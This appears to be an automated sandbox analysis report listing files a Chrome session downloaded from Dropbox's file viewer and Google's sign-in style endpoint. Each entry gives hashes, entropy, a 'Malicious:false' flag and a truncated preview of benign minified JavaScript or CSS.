                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var n=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,n.get?n:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var n=l(t);e.AutomationLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"m10.5 15 4.5-3-4.5-3v6Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"m16.453 11.06 1.114-1.417-.742-1.286-1.555.224-.479-.322a3.94 3.94 0 0 0-.79-.409l-.613-.234L12.742 6h-1.484l-.646 1.617-.614.234a3.94 3.94 0 0 0-.79.41l-.479.32-1.555-.223-.742 1.286 1.115 1.417-.035.571a5.901 5.901 0 0 0 0 .74l.035.57-1.115 1.416.742 1.286 1.555-.224.479.322c.247.165.512.303.79.409l.613.234.646 1.615h1.485l.646-1.617.614-.234a3.95 3.95 0 0 0 .79-.41l.478-.32 1.555.223.742
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (6586)
                                                    Category:downloaded
                                                    Size (bytes):13165
                                                    Entropy (8bit):5.1932336435436
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:41DBD41EE50CD1A9BDE0AA789F061DBF
                                                    SHA1:2E641003FD846ED11812B1A480139CF345C9C5E1
                                                    SHA-256:1B7CB42B960F9512F0B4BB63A3AFA4F121CE77FFBE83D8935605474F21DD6ABB
                                                    SHA-512:7967B3D32CA567DC27DED95174DDC41540F47E1E753758315F9031B0EC3FC498FA46A993985B743BB3FA18C1CA92E4E6018D030ADDF916D345656F9AE41D04D8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/js/comments2/index-vflQdvUHu.css
                                                    Preview:./* -- bazel-out/k8-opt/bin/node_modules/@dropbox/dig-tokens/dist/legacy-tokens.css */.:root{--color_background_backdrop:rgba(99,114,130,.5);--color_border_dark:#c6c9cd;--color_border_highlight:#ccd9fa;--color_border_light:#dddfe1;--color_brand_banana:#ffd830;--color_brand_black_cherry:#61082b;--color_brand_candy_apple:#d5001f;--color_brand_canopy:#005744;--color_brand_celadon:#a2d39b;--color_brand_cloud:#b4d0e7;--color_brand_dbx_blue:#0061ff;--color_brand_orchid:#ceb4ff;--color_brand_panda_black:#000;--color_brand_panda_white:#fff;--color_brand_pink_library:#ffafa2;--color_brand_rococo_gold:#ad780d;--color_brand_sand:#d8bea2;--color_brand_sapphire:#0d2481;--color_brand_stone:#d0d0d3;--color_brand_sunset:#fb570d;--color_brand_ultraviolet:#813bf6;--color_brand_wheat:#ffcb95;--color_dbx_blue_100:#0061ff;--color_dbx_blue_110:#0052d9;--color_dbx_blue_120:#0046ba;--color_dropshadow:rgba(99,114,130,.16);--color_focus_outline:#a6bdeb;--color_ink_100:#1d2737;--color_ink_15:#dddfe1;--color_ink_
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1028)
                                                    Category:dropped
                                                    Size (bytes):1103
                                                    Entropy (8bit):5.101617022055289
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D7D57159B3C0F6C71C285332F7284A4A
                                                    SHA1:8DE75E5B9D6DAD42E40E0A76F54FDD44C7FCE683
                                                    SHA-256:60E12B40CD08A4238AEBDFA5AE2D67351A8D164F46B71B4D656673E1FC24662C
                                                    SHA-512:3190189CF2304D24FE16FAA78ACF74A0D606AEE3584DA21193C55887BAE2CDCFED025339602C0A14F8F9923528BFC98429158270F45E1374A87145693E155DD0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_core_i18n","react"],(function(e,t,r){"use strict";function a(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var a=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,a.get?a:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=a(r);function s(e){var r=t.useIntl(),a=r.formatMessage,s=r.textComponent,o=void 0===s?n.Fragment:s,i=e.id,l=e.description,u=e.defaultMessage,c=e.values,d=e.children,f=e.tagName,g=void 0===f?o:f,m=a({id:i,description:l,defaultMessage:u},c,{ignoreTag:e.ignoreTag});return"function"==typeof d?d(Array.isArray(m)?m:[m]):g?n.createElement(g,null,n.Children.toArray(m)):n.createElement(n.Fragment,null,m)}s.displayName="FormattedMessage";var o=n.memo(s,(function(e,r){var a=e.values,n=t.__rest(e,["values"]),s=r.values,o=t.__rest(r,["values"]);return t.shallowEqual(s,a)&&t.shallowEqual(n,o)}));o.displayName="MemoizedFormattedMessage";var
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (25580)
                                                    Category:dropped
                                                    Size (bytes):25636
                                                    Entropy (8bit):5.162547455770579
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1A112530B015268BA8A8B5622CB15A70
                                                    SHA1:5F41E7E1739B76AEC6F992E70361EE3D2FF8B960
                                                    SHA-256:F6B5E2E2B12640CD167462E34BC35CCFFFDCA27E7B35EDF3B453B693C38FAF39
                                                    SHA-512:E000F4DA14550174F8B4F09BE72C999B5D790F3F2675FAE7266A854D2591EC65232E3E470949B5350D12B7892F1A78E94071EEF14B1749F5393939F130F6D22D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_contacts_contact","./c_profile_services_profile_services_link","./c_ts_utils","./c_plugin_utils_getImageDefaultSizes","./c_lodash","./e_data_modules_stormcrow","./e_edison","./c_api_v2_routes_folders_info_provider","./e_core_exception"],(function(t,e,s,i,r,n,c,o,a,h,l){"use strict";var u;const _=t=>t,d=t=>"string"==typeof t?t:JSON.stringify(t),f=()=>{},p=t=>t?t.split(/\s+/):[],m=t=>t?t.split(/\W+/):[],g=t=>function(e){return s=>{let i=[];return e.forEach((e=>{var r;i=i.concat(t(null!==(r=s[e])&&void 0!==r?r:""))})),i}},C={nonword:m,whitespace:p,obj:{nonword:g(m),whitespace:g(p)}};class w{constructor(){this.add=t=>{this.head&&(t.next=this.head,this.head.prev=t),this.head=t,this.tail=this.tail||t},this.remove=t=>{t.prev?t.prev.next=t.next:this.head=t.next,t.next?t.next.prev=t.prev:this.tail=t.prev},this.moveToFront=t=>{this.remove(t),this.add(t)},this.head=this.tail=void 0}}class y{constructor(t,e){this.key=t,this.val=e,this
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (923)
                                                    Category:dropped
                                                    Size (bytes):990
                                                    Entropy (8bit):4.813252177682054
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:82B6E26B3545A5335B86A68396C5D401
                                                    SHA1:A5A039D9169603E15DD7792C099D7E79C8F0592B
                                                    SHA-256:1A35CD766D1ECC64607B900AD8CB8B97EB8C0CDF445861F899D7501153FB7218
                                                    SHA-512:21201D41CB62CCCB6BE32CFA332422A97585F1D29DA1D79156256DA19F466AE19D4A5CA486923EE4EECB2843BE967A9BA2A55EF36C3C31264DBB7CFE94C6FDD9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_core_i18n","./c_file_actions_strings","./c_files_view_file_actions_snackbars","./e_file_viewer_static_scl_page_folder","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","react","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,r,a,s,_,n,c,t,o,i,l,m,d,f,g,p,k,u,v,S){"use strict";e.renameCompleteSnackBar=e=>_.Snackbar.complete(r.intl.formatMessage(a.renameSnackbarSuccessMessage),e),e.renameFailedSnackBar=(e,r,a)=>_.Snackbar.fail(s.renameError(e.error),a),e.renameSnackBarInProgress=e=>_.Snackbar.sync(r.intl.formatMessage(a.renameSnackbarProgressMessage),!1,e)}));.//# sourceMappingURL=c_portable_rename_snackbars.js-vfl4vSqSc.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2457)
                                                    Category:dropped
                                                    Size (bytes):2515
                                                    Entropy (8bit):5.045195498505381
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5E2715AB1BFE0F741A66F8964B223C6B
                                                    SHA1:1BF9FB3008BB515A58C3DB99BCAB92129DD13943
                                                    SHA-256:4C2C0AE3D45E89B2E17D96C00F64303588BC7811859FB7D5A84381BAD6577ED7
                                                    SHA-512:BDFE6C83441577F7010A19AFBD89562A931F2E1462835C0400218931DB9FAF3EC065431395F01930B20D0C7EA12D35E3173F80236A74CA637CE2295D2334D7F2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(i){"use strict";var t=function(i,t,s,a,e,r,n,c){if(!i){var h;if(void 0===t)h=new Error("Minified exception occurred; use the non-minified dev environment for the full error message and additional helpful warnings.");else{var p=[s,a,e,r,n,c],o=0;h=new Error("Invariant Violation: "+t.replace(/%s/g,(function(){return p[o++]})))}throw h.framesToPop=1,h}},s=1;function a(){this.$Dispatcher_callbacks={},this.$Dispatcher_isPending={},this.$Dispatcher_isHandled={},this.$Dispatcher_isDispatching=!1,this.$Dispatcher_pendingPayload=null}a.prototype.register=function(i){var t="ID_"+s++;return this.$Dispatcher_callbacks[t]=i,t},a.prototype.unregister=function(i){t(this.$Dispatcher_callbacks[i],"Dispatcher.unregister(...): `%s` does not map to a registered callback.",i),delete this.$Dispatcher_callbacks[i]},a.prototype.waitFor=function(i){t(this.$Dispatcher_isDispatching,"Dispatcher.waitFor(...): Must be invoked while dispatching.");for(var s=0;s<i.length;s++){var a=i[s];
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (7762)
                                                    Category:downloaded
                                                    Size (bytes):7838
                                                    Entropy (8bit):5.184947307290209
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F33AA9BEF5793B4565C5D059CD4DD48B
                                                    SHA1:203353755371DDB18FB07D8CDEB58846A89DAEEF
                                                    SHA-256:74501E5FBF0BAB914C208BE3F1593AE68BDDBBCEC111F31B3C360F593FE3179D
                                                    SHA-512:52E647DA103C51F971C84DCE31A4C25C35BE152A529765E8775161E0DDEE9A3C65140F0BD98C881C88F3219D65F65F02E57B1B8007FF1BDC1597254046D165FF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_toolbar_toolbar_holder-vfl8zqpvv.js
                                                    Preview:define(["exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./c_core_data_ui","./c_file_viewer_components_preview_button","./c_file_viewer_hooks_use_mouse_active","./c_file_viewer_keyboard_bindings","./c_preview_audio_video_helper_dimensions","./c_file_viewer_toolbar_toolbar_holder2","./c_juggle_resize-observer_ResizeObserver","./c_file_viewer_toolbar_utils"],(function(e,t,n,o,l,a,i,r,c,s,d,u){"use strict";function f(e){return e&&e.__esModule?e:{default:e}}var m=f(t);const p=()=>{const[e,t]=m.default.useState(null),[n,o]=m.default.useState();return m.default.useEffect((()=>{if(!e)return;const t=new d.ResizeObserver((e=>o(e[0].contentRect)));return t.observe(e),o(e.getBoundingClientRect()),()=>t.disconnect()}),[e]),{nodeRef:t,contentRect:n,node:e}},g=e=>(t,n)=>n?[...t,n.offsetLeft+n.offsetWidth-e]:t,b=(e,t)=>(n,o,l)=>o>e||!t(l)&&o+48>e?n:n+1,h=m.default.memo((({actions:e,logAction:t})=>{if(!e)return null;const n=[],o=e=>{const o=e.handler;"click"===o.type&&o.keyb
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3682)
                                                    Category:dropped
                                                    Size (bytes):3749
                                                    Entropy (8bit):5.2686302105917875
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3FA99543B4E718365824A46FB8EA584E
                                                    SHA1:607A193B76D9B7B1FF861CD75F5FB47ADF764134
                                                    SHA-256:371496F27C5BCC60F8B215B39F605EBCC5EAB8CE27950A55E8DFD4E09F05E060
                                                    SHA-512:081B440FE162732D92DE1A8176043C366B4B5BC9A8700BCB187DC880DC24B6EE59FE7B401C46EB3C3336AC323C94F992A4988FCF7636B0373DA6DCEED40175B1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder"],(function(e,i,t){"use strict";function d(e){if(e&&e.__esModule)return e;var i=Object.create(null);return e&&Object.keys(e).forEach((function(t){if("default"!==t){var d=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(i,t,d.get?d:{enumerable:!0,get:function(){return e[t]}})}})),i.default=e,Object.freeze(i)}var a=d(i),s=a.createContext({isSelectable:!1,spacing:"medium",verticalAlign:"center"}),n=(e,i,...t)=>{const d=t.find((e=>void 0!==e));return void 0===d?e:{...e,[i]:d}},l=({padding:e,paddingBottom:i,paddingLeft:t,paddingRight:d,paddingTop:s,paddingY:l,paddingX:g})=>a.useMemo((()=>{let a={};return a=n(a,"padding",e),a=n(a,"paddingLeft",g,t),a=n(a,"paddingRight",g,d),a=n(a,"paddingTop",l,s),a=n(a,"paddingBottom",l,i),a}),[e,i,t,d,s,g,l]),g="dig-1gsd8yo2_20-8-0",c=t.createRuntimeFn({defaultClassName:"dig-1gsd8yo6_20-8-0",variantClassNames:{alignment:{center:"dig-1gsd8yo7_20-8-0",top:"dig-1gsd8yo8_20-8-0"},spaci
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (533), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):533
                                                    Entropy (8bit):4.933115570682282
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FEB698008C36A09DFE88AB06A1C3E3B9
                                                    SHA1:A871FBCBBE298AE7078D06627708B2C106A0FAF3
                                                    SHA-256:1C4E7E389D73C6ACF7F19CC812514E71230740791FDE8A018C1D7EDCCF1590AE
                                                    SHA-512:F8E3CA3E49B1C027232D1B3AAB82B5430F4A69334A5E18BEB4469C39D6A24D3F4D3FA4C473F360B619CE734977F0D7EFD03BE6ACB5EB7B9F69295FB2CBF94D9B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://accounts.google.com/gsi/style
                                                    Preview:#credential_picker_container{border:none;height:330px;position:fixed;right:20px;top:20px;width:391px;z-index:9999}#credential_picker_container iframe{border:none;width:391px;height:330px}#g_a11y_announcement{height:1px;left:-10000px;overflow:hidden;position:absolute;top:auto;width:1px}.L5Fo6c-sM5MNb{border:0;display:block;left:0;position:relative;top:0}.L5Fo6c-bF1uUb{-webkit-border-radius:4px;border-radius:4px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0}.L5Fo6c-bF1uUb:focus{border:none;outline:none}sentinel{}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1397)
                                                    Category:downloaded
                                                    Size (bytes):1473
                                                    Entropy (8bit):5.407403787401611
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:45535D05104C4BE60BA537387BF5629D
                                                    SHA1:60212825D89AFD9FBEFD1A45275D21764ED8E71A
                                                    SHA-256:961C5B1BBB2C3E9D914322F761A6B7B876125DDE8151947CB8FD5BFD9EEFA80E
                                                    SHA-512:4304D633E32984C3A640317248AFBB1C0E729064C9573DF9BF882219E4D512B74D94D81ED15D983871B75CE3DA0897F20EF062DF4A9D9E9785514576806B23A9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_pap-events_sign_save_signature_doc-vflRVNdBR.js
                                                    Preview:define(["exports"],(function(t){"use strict";const e="info_blade",n="file_activity",i=[e,n];t.AI_PLUGIN_ID="previews_ai_plugin",t.COMMENTS_PLUGIN_ID="comments",t.FILE_ACTIVITY_PLUGIN_ID=n,t.INFO_BLADE_PLUGIN_ID=e,t.PAP_Save_SignatureDoc=function(t){return{class:"sign",action:"save",object:"signature_doc",properties:t}},t.PAP_Send_SignatureDoc=function(t){return{class:"sign",action:"send",object:"signature_doc",properties:t}},t.PAP_Start_SignatureDoc=function(t){return{class:"sign",action:"start",object:"signature_doc",properties:t}},t.PDF_EDITOR_PLUGIN_ID="pdf_edit_plugin",t.PHOTO_EDITOR_PLUGIN_ID="photo_edit_plugin",t.RafThrottle=class{constructor(t){this.request=()=>{this.ticking||(this.ticking=!0,this.currentRequestId=requestAnimationFrame((()=>{this.thunk(),this.ticking=!1})))},this.cancelPending=()=>{cancelAnimationFrame(this.currentRequestId)},this.thunk=t}},t.TEXT_EDITOR_PLUGIN_ID="text_edit_plugin",t.TRANSCRIPT_BLADE_PLUGIN_ID="transcript_blade",t.TRANSLATION_PLUGIN_ID="transla
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (65488), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):229463
                                                    Entropy (8bit):5.478431318803545
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:41B925A7FF1CEE2D6DB427F2E01A3428
                                                    SHA1:190C0941A3A7838FD1E887AD91EA36C7B0E9D769
                                                    SHA-256:470F55AF449B23EF796353A9469899325A545A0D7AEA2B7B828BA8992B811D62
                                                    SHA-512:AF447D15359ED471016849478E302D05F2545F348DE9AC6FADF451A830B9F0B396231888FE55F49C4C71AA3FAA153538EE807FE5DCF21127224D01CD28C19B4B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_src_bindings_provider-vflQbklp_.js
                                                    Preview:define(["require","exports","./e_file_viewer_static_scl_page_folder","react","./c_core_i18n","./e_data_modules_stormcrow","./c_datatypes_sharing_account-metadata","./c_shared_with_redux_store","./c_contacts_contact","./c_validators","./c_file_viewer_title_bar_title_bar_pass_ui","./c_sharing_sharing_pap_logging_send_share_invite_util","./c_dig-components_typeahead_index","./c_dig-components_chip_index","./c_dig-icons_assets_ui-icon_line_share","./c_dig-components_skeleton_index","./c_dig-icons_assets_ui-icon_line_settings","./c_dig-icons_assets_ui-icon_line_member-transfer","./c_dig-icons_assets_ui-icon_line_star","./c_react-intl_src_components_message","./c_src_common_format_bytes","./c_files_view_util","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_api-v2-client_src_dropbox","react-dom","./c_ts_utils","./c_react_query_helpers_queries_login_and_register_constants","./c_integrations_hellosign_deep_integration_constants"],(function(e,t,a,n,r,i,o,s,l,_,d,c,u,g,m,p,h,E,f,v,S,b
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (865)
                                                    Category:dropped
                                                    Size (bytes):932
                                                    Entropy (8bit):4.85279052898112
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C75E5AA493A4B8CC1571147A735C28DC
                                                    SHA1:B2384F619CB4B036CC2D81236E5712F2E79ED2F9
                                                    SHA-256:F0C09027C69BC5B20E93F54359918D75A4776A92651C6C76BE35FE703C0CB043
                                                    SHA-512:F4E133B807F09742A7C8389B98B40858BDCCFBC064AF492A8365F765582C42B1A6EEB580C116092062E3DE958343312A714DB183091362CEE6D16A9B121E0A2D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_files_view_file_actions_snackbars","./e_file_viewer_static_scl_page_folder","./c_core_i18n","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","react","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,r,_,t,s,c,o,a,n,i,l,d,p,m,f,u,v,k,g){"use strict";e.deleteCompleteSnackBar=(e,t=1)=>_.Snackbar.complete(r.deleteCompleteSuccess(t,t),e),e.deleteFailedSnackBar=(e,t,s=1)=>{e.error&&_.Snackbar.fail(r.deleteError(s,e.error),t)},e.deleteSnackBarInProgress=(e,t=1)=>_.Snackbar.sync(r.deleteInProgress(t),!1,e)}));.//# sourceMappingURL=c_portable_delete_snackbars.js-vfltaTaSh.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1153)
                                                    Category:downloaded
                                                    Size (bytes):1256
                                                    Entropy (8bit):5.105881235995036
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8319F3CA58F06E4EDD20EF8F2EA7EC4F
                                                    SHA1:FBDB1180CBBD24E28CAE82ADD2D658C72E85E9B2
                                                    SHA-256:1E0F794DAFF5739DB4EDE5D1DB7478742017DFC00F6E5A910A70288650CFD386
                                                    SHA-512:741EEC362A8D06058446E67F601E9B9EB915F1A378938D0303987A95E0AABFB5F8B207BC3623BB902DD32B5851EA3D8D81CA9D2A644425992D849D2A36CF736B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_title_bar_title_bar_file_breadcrumb.after-display-vflgxnzyl.js
                                                    Preview:define(["exports","./c_core_logging_actions","./e_file_viewer_static_scl_page_folder","./c_lodash","./e_edison","react","./c_core_i18n","./e_core_exception","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,t,o,n,r,c,i,_,s,a,d,l,u,m,p,v,f,w,h){"use strict";const g=n.lodashExports.once(((e,n)=>{const c=r.onTTVC((()=>{const r=document.querySelector("[data-tooltip=title-bar-breadcrumb]"),i=r&&r.offsetWidth>0;e(t.logPreviewEvent({event:i?o.EventType.FileBreadcrumbShown:o.EventType.FileBreadcrumbNotShown,fileViewerId:n}));const _=document.querySelector('[data-dropdown-title="File"]'),s=_&&_.offsetWidth>0;e(t.logUserActionEvent({userAction:s?o.UserAction.FileMe
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2602)
                                                    Category:downloaded
                                                    Size (bytes):2603
                                                    Entropy (8bit):4.832188065876641
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1C79239764C3FAB45CFCD7D07C9701C1
                                                    SHA1:2AA037EC6CAF51EF6941F93A0A60DD4A04F78190
                                                    SHA-256:E5D2F57F186D5650DD607E4D52B5A80CC6286B923ABB6063C0817008576EE2C7
                                                    SHA-512:E6FBA640A6AABBCDFE9075671DA6C22E26708573B85BA702D8DC6930DF03B0567E16011F51B1082234C2B2DE4702A75F920884D48BA144520174FC83E7495276
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/account_menu_v2-vflHHkjl2.css
                                                    Preview:.account-menu-v2__tooltip{word-break:break-all}.account-menu-v2__avatar-button{height:auto !important;line-height:auto !important}.account-menu-v2__avatar-button span{box-shadow:none !important}.account-menu-v2__avatar-button:focus .account-menu-v2__avatar{box-shadow:var(--dig-utilities__boxshadow__focus-ring)}.js-focus-visible .account-menu-v2__avatar-button:focus:not(.focus-visible) .account-menu-v2__avatar{box-shadow:none}.account-menu-v2__avatar-header{margin-top:0 !important}.account-menu-v2__content>div{width:270px}.account-menu-v2__user-summary{display:flex;flex-direction:column;margin-top:calc(0.75 * var(--spacing__base_unit));margin-left:calc(2 * var(--spacing__base_unit));margin-right:calc(2 * var(--spacing__base_unit))}.account-menu-v2__user-summary .account-menu-v2__quota-bar-btn{display:block;margin-top:var(--spacing__base_unit);margin-bottom:var(--spacing__base_unit)}.account-menu-v2__user-summary .account-menu-v2_quota-bar-btn-container{width:-webkit-max-content;width:ma
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1736)
                                                    Category:downloaded
                                                    Size (bytes):1815
                                                    Entropy (8bit):5.361267679751276
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:11523F9C91180BC9E69601B492177DF0
                                                    SHA1:68245CE102997225CDC6E6B897A4C332A3849019
                                                    SHA-256:1BB2D5477095BE1ADE5A7F00A0FF9C0CBE9FF2BDA012D4DEF79796D0C7F1FD4B
                                                    SHA-512:7AFDB1B6D7DE3B2184D089071EDDC2DD59990DF04D97B3088FF1BF9E1854C82F7DCE287A49122FFBC20ED3F732D394755D8F9B600E4444E3F3B25BC411B301F9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_action_plugins_pdf_edit_action_action-vflEVI_nJ.js
                                                    Preview:define(["exports","./c_plugin_utils_tilingFunc","./c_pap-events_sign_save_signature_doc"],(function(t,e,i){"use strict";var a;t.EntryPoint=void 0,(a=t.EntryPoint||(t.EntryPoint={})).PHOTOS="PHOTOS",a.PREVIEWS="PREVIEWS";var n=Object.freeze({__proto__:null,pdfEditAction:function(t,e,a){const n=t.getCurrentPage();t.setActiveEditorCallback(i.PDF_EDITOR_PLUGIN_ID,e,a||n?{...a&&{source:a},...void 0!==n&&{page_number:n.toString()}}:void 0)}});t.action_esnext=n,t.drawWatermarkOnCanvas=({canvas:t,scale:i,mode:a,watermarkOptions:n,textWatermarkOptions:r,imageWatermarkOptions:o})=>{const s=t.getContext("2d");if(null!==s){s.clearRect(0,0,t.width,t.height);const{position:c,marginX:l,marginY:g}=n;if("REPEAT"===c){let n;try{n=e.tilingFunc({scale:i,mode:a,textWatermarkOptions:r,imageWatermarkOptions:o})}catch(t){if("NO_TILE_INPUT"===t.message)return;throw t}let c=0,l=0;for(let e=(n.startY+l)%n.distanceY-n.height;e<t.height;e+=n.distanceY){for(let i=(n.startX+c)%n.distanceX-n.width;i<t.width;i+=n.dist
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (6830)
                                                    Category:dropped
                                                    Size (bytes):6891
                                                    Entropy (8bit):5.356112159728164
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F310F46218ACBB01845DB9C245000973
                                                    SHA1:54921111F424F3A6B2E6A8099389CCA1710914FC
                                                    SHA-256:C0D01A9F347A8FB75A84264B76F8BE4C06687B46CCFAE4CCD21CD2BA6BE5BB3C
                                                    SHA-512:312D4BD758BD7C8633DF0CF94C59427A70078A906685D916A5BFAD89A93035266B50041E5573BF214032E30DBEE8BD85C4E55DA112FA36289E339B0917C8A530
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder"],(function(e,t,o){"use strict";function i(e){return e&&e.__esModule?e:{default:e}}var l=i(t);const d=(e,t,o)=>{const i=r(o,t)?o:void 0;if("object"==typeof e)return Object.keys(e).reduce(((o,i)=>{const l=e[i];return r(l,t)?{...o,[i]:l}:o}),{mobile:i});{const o=e,l=r(o,t)?o:void 0;return null!=l?l:i}},r=(e,t)=>void 0!==e&&t.includes(e),a=e=>"number"==typeof e?e%1==.5?~~e+"_5":`${e}`:"boolean"==typeof e?e.toString():e||"",n=(e,t)=>{var o,i,l,d,r,a,n,s,g,u,f,p,v,c,b,w,m,x,$,y,h;const k={};if(null==e)return k;if("string"==typeof e||"number"==typeof e||"boolean"==typeof e)k[`${t}--mobile`]=e,k[`${t}--mobile-lg`]=e,k[`${t}--tablet`]=e,k[`${t}--tablet-lg`]=e,k[`${t}--desktop`]=e,k[`${t}--desktop-lg`]=e,k[`${t}--ultrawide`]=e;else if("object"==typeof e){const{mobile:V,mobileLarge:D,tablet:C,tabletLarge:S,desktop:N,desktopLarge:W,ultrawide:j}=e;k[`${t}--mobile`]=null!=V?V:"unset",k[`${t}--mobile-lg`]=null!==(o=null!=D?D:V)&&void
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1649)
                                                    Category:downloaded
                                                    Size (bytes):2689
                                                    Entropy (8bit):4.880852250421968
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:25057071D4079DEB15A0571DC8CDA36C
                                                    SHA1:02980965AF483DFA6A59DAC2B935E22030B99C9B
                                                    SHA-256:0042C340345C05241045EAFF678E9D8DE05116DB7A0BE793B7E02673C6DD9BE9
                                                    SHA-512:E265CE5774DFCFFB99D57C12C68444828DF41C4DC26714386FDA145980B01776DBAE28B2FD72394717343E999991BC0F88FC1D3416EC0F12B4EC0746D511E333
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/typescript/component_libraries/pro-ui/src/index.web-vflJQVwcd.css
